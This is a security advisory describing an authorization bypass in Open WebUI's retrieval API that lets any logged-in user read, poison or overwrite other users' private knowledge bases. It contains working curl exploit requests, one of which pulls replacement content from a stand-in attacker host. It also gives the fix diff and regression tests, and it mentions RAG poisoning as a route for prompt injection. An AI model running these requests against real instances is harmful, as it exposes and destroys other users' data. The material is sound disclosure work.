GHSA-4g37-7p2c-38r9HighCVSS 7.5

Open WebUI Vulnerable to IDOR: Retrieval API Bypasses Knowledge Base Access Controls

Published
May 14, 2026
Last Modified
May 15, 2026

🔗 CVE IDs covered (1)

📋 Description

# IDOR: Retrieval API Bypasses Knowledge Base Access Controls **Author:** Andrew Orr <aorr@tenable.com> ## Summary `_validate_collection_access()` ([PR #22109](https://github.com/open-webui/open-webui/pull/22109)) checks the `user-memory-*` and `file-*` collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (`/process/text`, `/process/file`, `/process/files/batch`, `/process/web`, `/process/youtube`), allowing an attacker to inject content into or overwrite another user's knowledge base. Reproduced on `main` at commit `4d058a125` (v0.8.11) on March 26, 2026. ## Severity - CWE-639: Authorization Bypass Through User-Controlled Key - CVSS 3.1: `7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)` -- `AC:H` because exploitation requires knowing a target UUID; `I:H` and `A:H` because the write path allows poisoning or destruction of another user's knowledge base ## Default Configuration Reachability Reachable in default configuration. All affected endpoints require only `get_verified_user`, not `get_admin_user`, so any non-admin account in a typical multi-user deployment can reach them. The only prerequisite beyond authentication is knowledge of a target knowledge base UUID, which is reflected in the `AC:H` score. However, KB UUIDs are stable identifiers that leak through normal usage rather than secrets (see Prerequisites below). ## Root Cause Knowledge base embeddings are stored in vector DB collections named with the knowledge base's UUID (e.g., `550e8400-e29b-41d4-a716-446655440000`). The `_validate_collection_access` function only blocks two specific prefixes: ```python # backend/open_webui/routers/retrieval.py lines 2330-2355 def _validate_collection_access(collection_names: list[str], user) -> None: if user.role == "admin": return for name in collection_names: if name.startswith("user-memory-") and name != f"user-memory-{user.id}": raise HTTPException( status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) elif name.startswith("file-"): file_id = name[len("file-"):] if not has_access_to_file( file_id=file_id, access_type="read", user=user, ): raise HTTPException( status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) # No else clause -- knowledge base UUIDs pass through unchecked ``` Knowledge base UUIDs do not match either prefix, so the function returns without raising an exception. The query then executes against the vector DB with no further authorization check. ## Vulnerable Endpoints ### Read Endpoints Both retrieval query endpoints accept a collection name and call `_validate_collection_access` as their sole authorization gate: 1. `POST /api/v1/retrieval/query/doc` (line 2367) -- single `collection_name` 2. `POST /api/v1/retrieval/query/collection` (line 2432) -- list of `collection_names` ### Write Endpoints The following endpoints accept a `collection_name` parameter and write to the target collection without checking whether the caller owns it: 3. `POST /api/v1/retrieval/process/text` (line 1777) -- appends attacker-controlled content to the target collection 4. `POST /api/v1/retrieval/process/file` (line 1528) -- validates ownership of the uploaded file but not the destination collection 5. `POST /api/v1/retrieval/process/files/batch` (line 2578) -- same as above for multiple files 6. `POST /api/v1/retrieval/process/web` and `POST /api/v1/retrieval/process/youtube` (lines 1810-1811) -- same handler; `overwrite` defaults to `true`, so targeting an existing knowledge base deletes and replaces it | Endpoint | Read | Write | Overwrite | Access Check | |----------|------|-------|-----------|--------------| | /query/doc | Yes | -- | -- | Prefix-only (bypassed) | | /query/collection | Yes | -- | -- | Prefix-only (bypassed) | | /process/text | -- | Yes | -- | None | | /process/web | -- | Yes | Yes (default) | None | | /process/youtube | -- | Yes | Yes (default) | None (same handler as /process/web) | | /process/file | -- | Yes | -- | File only, not collection | | /process/files/batch | -- | Yes | -- | File only, not collection | ## Proof of Concept **Security boundary crossed:** The knowledge base access control system (ownership checks, group-based access grants) is bypassed at the retrieval layer. A non-admin user who knows a private knowledge base UUID can read it, append attacker-controlled content to it, or destroy and replace it through the retrieval API, even though the knowledge API correctly denies the same user access to the same resource. `open-webui-idor-poc.sh` provides a self-contained Docker lab that stands up the target environment and tests every vulnerable endpoint listed above. See the comments at the top of that file for setup, usage, and configuration options. ### Prerequisites - Attacker has an authenticated (non-pending) account on the target instance. - A victim user has created a private knowledge base containing sensitive documents. - Attacker knows the victim's knowledge base UUID. V4 UUIDs are not guessable, but they are stable identifiers that leak through normal platform usage: - **Access revocation:** A user learns a KB UUID through a shared workspace or group, loses access, and finds the retrieval API still honors the stale UUID. The knowledge API correctly revokes access at request time (`access_grants.py:549-558` dynamically queries current group memberships), but the retrieval API has no equivalent check. - **Model metadata:** When a model is shared with a group, `GET /api/models/list` returns the full `meta.knowledge` array -- including KB UUIDs -- to every user with access to the model, even if they have no access to the referenced knowledge bases (`models.py:58-130`). - **URL leakage:** KB UUIDs appear in browser URLs (`/workspace/knowledge/{id}`, `Knowledge.svelte:260`) and can leak through shared links, browser history, Referrer headers, or proxy logs. - **RAG citation metadata:** KB UUIDs are stored as `source.id` in chat message sources (`middleware.py:1950-1965`, `socket/main.py:880-897`). Shared chats return these sources unfiltered (`chats.py:815-830`). ### Read: Extract Private KB Content Authenticate as the attacker: ```bash TOKEN=$(curl -s -X POST https://open-webui/api/v1/auths/signin \ -H "Content-Type: application/json" \ -d '{"email": "attacker@example.com", "password": "password"}' \ | jq -r '.token') ``` **Control request:** the knowledge API correctly blocks the attacker: ```bash curl -s https://open-webui/api/v1/knowledge/<victim_kb_uuid> \ -H "Authorization: Bearer $TOKEN" ``` ```json {"detail": "You do not have permission to access this resource."} ``` **Exploit request:** the retrieval API returns the same KB's content without authorization: ```bash curl -s -X POST https://open-webui/api/v1/retrieval/query/doc \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "collection_name": "<victim_kb_uuid>", "query": "confidential", "k": 50 }' ``` Expected result when vulnerable: the server returns matching document chunks from the victim's private knowledge base, including text content and metadata (source filenames, file IDs, hashes). The `/query/collection` endpoint accepts a list of collection names and behaves identically: ```bash curl -s -X POST https://open-webui/api/v1/retrieval/query/collection \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "collection_names": ["<victim_kb_uuid>"], "query": "confidential", "k": 50 }' ``` ### Write: File Injection via /process/file The `/process/file` endpoint validates that the attacker owns the uploaded file but does not validate the target `collection_name`. The attacker uploads a file under their own account, then processes it into the victim's collection: ```bash # Upload attacker's file FILE_ID=$(curl -s -X POST https://open-webui/api/v1/files/ \ -H "Authorization: Bearer $TOKEN" \ -F "file=@payload.txt;type=text/plain" \ | jq -r '.id') # Process it into the victim's KB collection curl -s -X POST https://open-webui/api/v1/retrieval/process/file \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d "{ \"file_id\": \"$FILE_ID\", \"collection_name\": \"<victim_kb_uuid>\" }" ``` ### Write: Batch File Injection via /process/files/batch Same pattern as above but accepts multiple files in a single request: ```bash # Get the full file object for the attacker's uploaded file FILE_OBJ=$(curl -s https://open-webui/api/v1/files/$FILE_ID \ -H "Authorization: Bearer $TOKEN") # Batch-process into the victim's KB collection curl -s -X POST https://open-webui/api/v1/retrieval/process/files/batch \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d "{ \"files\": [$FILE_OBJ], \"collection_name\": \"<victim_kb_uuid>\" }" ``` ### Write: Text Injection via /process/text `/process/text` appends attacker-controlled content to an existing knowledge base collection: ```bash curl -s -X POST https://open-webui/api/v1/retrieval/process/text \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "name": "injected.txt", "content": "INJECTED BY ATTACKER: attacker-controlled content", "collection_name": "<victim_kb_uuid>" }' ``` The PoC then verifies that the injected text is returned by a follow-up query against the victim collection. ### Write: YouTube Transcript Replacement via /process/youtube `/process/youtube` uses the same handler as `/process/web` with the same `overwrite=true` default. This request replaces the victim's collection with the fetched transcript: ```bash curl -s -X POST https://open-webui/api/v1/retrieval/process/youtube \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ", "collection_name": "<victim_kb_uuid>" }' ``` ### Write: Data Destruction via /process/web `/process/web` defaults to `overwrite=true`, which deletes the existing collection before writing. The explicit query string below makes the destructive behavior obvious: ```bash curl -s -X POST "https://open-webui/api/v1/retrieval/process/web?overwrite=true" \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "url": "https://attacker.com/payload.html", "collection_name": "<victim_kb_uuid>" }' ``` ## Impact - **Confidentiality**: Any authenticated user can read private knowledge base contents belonging to other users on the instance. - **Integrity**: Attacker-controlled content can be injected into another user's knowledge base, poisoning downstream RAG results. Injected prompt-injection payloads would be passed to the model when the victim queries the knowledge base. - **Availability**: `/process/web` and `/process/youtube` default to `overwrite=true`, letting an attacker delete and replace a victim's entire knowledge base in a single request. ## Remediation Two changes are needed: 1. Add a `permission` parameter to `_validate_collection_access`, use it for both `file-*` and knowledge base checks, and add a knowledge base ownership/access check for collection names that do not match the existing prefixes. `AccessGrants.has_access` already resolves group memberships internally when `user_group_ids` is omitted, matching the pattern used throughout `knowledge.py`. 2. The affected write endpoints must call `_validate_collection_access` with `permission="write"` before operating on the provided `collection_name`. ```diff --- a/backend/open_webui/routers/retrieval.py +++ b/backend/open_webui/routers/retrieval.py @@ -39,4 +39,5 @@ from open_webui.models.files import FileModel, FileUpdateForm, Files from open_webui.utils.access_control.files import has_access_to_file from open_webui.models.knowledge import Knowledges +from open_webui.models.access_grants import AccessGrants from open_webui.storage.provider import Storage @@ -2330,26 +2331,39 @@ -def _validate_collection_access(collection_names: list[str], user) -> None: +def _validate_collection_access(collection_names: list[str], user, permission: str = "read") -> None: if user.role == "admin": return for name in collection_names: if name.startswith("user-memory-") and name != f"user-memory-{user.id}": raise HTTPException( status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) elif name.startswith("file-"): file_id = name[len("file-"):] - if not has_access_to_file( - file_id=file_id, - access_type="read", - user=user, - ): + if not has_access_to_file( + file_id=file_id, + access_type=permission, + user=user, + ): raise HTTPException( status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) + else: + knowledge = Knowledges.get_knowledge_by_id(id=name) + if knowledge and knowledge.user_id != user.id: + if not AccessGrants.has_access( + user_id=user.id, + resource_type="knowledge", + resource_id=name, + permission=permission, + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail=ERROR_MESSAGES.ACCESS_PROHIBITED, + ) ``` The existing read callers (`/query/doc`, `/query/collection`) use the default `permission="read"` and require no change. Each affected write endpoint needs a validation call after `collection_name` is resolved: `/process/text` (line 1777): ```diff @@ -1783,5 +1783,6 @@ collection_name = form_data.collection_name if collection_name is None: collection_name = calculate_sha256_string(form_data.content) + _validate_collection_access([collection_name], user, permission="write") docs = [ ``` `/process/web` and `/process/youtube` (lines 1810-1811, same handler): ```diff @@ -1824,5 +1824,6 @@ collection_name = form_data.collection_name if not collection_name: collection_name = calculate_sha256_string(form_data.url)[:63] + _validate_collection_access([collection_name], user, permission="write") if not request.app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL: ``` `/process/file` (line 1528): ```diff @@ -1548,6 +1548,7 @@ collection_name = form_data.collection_name if collection_name is None: collection_name = f"file-{file.id}" + _validate_collection_access([collection_name], user, permission="write") if form_data.content: ``` `/process/files/batch` (line 2578): ```diff @@ -2593,3 +2593,4 @@ collection_name = form_data.collection_name + _validate_collection_access([collection_name], user, permission="write") file_results: List[BatchProcessFilesResult] = [] ``` ## Regression Test A regression test should verify that `_validate_collection_access` blocks non-owners from accessing knowledge base collections: ```python from unittest.mock import MagicMock, patch import pytest from fastapi import HTTPException from open_webui.routers.retrieval import _validate_collection_access def test_validate_collection_access_blocks_non_owner_read(): victim_kb_id = "550e8400-e29b-41d4-a716-446655440000" attacker = MagicMock() attacker.id = "attacker-user-id" attacker.role = "user" mock_knowledge = MagicMock() mock_knowledge.user_id = "victim-user-id" with patch( "open_webui.routers.retrieval.Knowledges.get_knowledge_by_id", return_value=mock_knowledge, ), patch( "open_webui.routers.retrieval.AccessGrants.has_access", return_value=False, ): with pytest.raises(HTTPException) as exc_info: _validate_collection_access([victim_kb_id], attacker) assert exc_info.value.status_code == 403 def test_validate_collection_access_blocks_non_owner_write(): victim_kb_id = "550e8400-e29b-41d4-a716-446655440000" attacker = MagicMock() attacker.id = "attacker-user-id" attacker.role = "user" mock_knowledge = MagicMock() mock_knowledge.user_id = "victim-user-id" with patch( "open_webui.routers.retrieval.Knowledges.get_knowledge_by_id", return_value=mock_knowledge, ), patch( "open_webui.routers.retrieval.AccessGrants.has_access", return_value=False, ): with pytest.raises(HTTPException) as exc_info: _validate_collection_access( [victim_kb_id], attacker, permission="write" ) assert exc_info.value.status_code == 403 ``` For additional coverage, maintainers may want an integration test that creates a knowledge base as one user and confirms that a second user's retrieval query is rejected end-to-end. ## AI Disclosure AI assistance was used to help analyze the code paths, develop the PoC workflow, and draft this report. ## Attachments [open-webui-idor-poc.log](https://github.com/user-attachments/files/26283199/open-webui-idor-poc.log) [open-webui-idor-poc.sh](https://github.com/user-attachments/files/26283201/open-webui-idor-poc.sh) ## Tenable's Disclosure Policy Tenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we'll issue an advisory on June 24, 2026 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf Thank you for taking the time to read this. We'd greatly appreciate it if you'd acknowledge receipt of this report. If you have any questions we'd be happy to address them.

🎯 Affected products1

  • pip/open-webui:<= 0.9.4

🔗 References (5)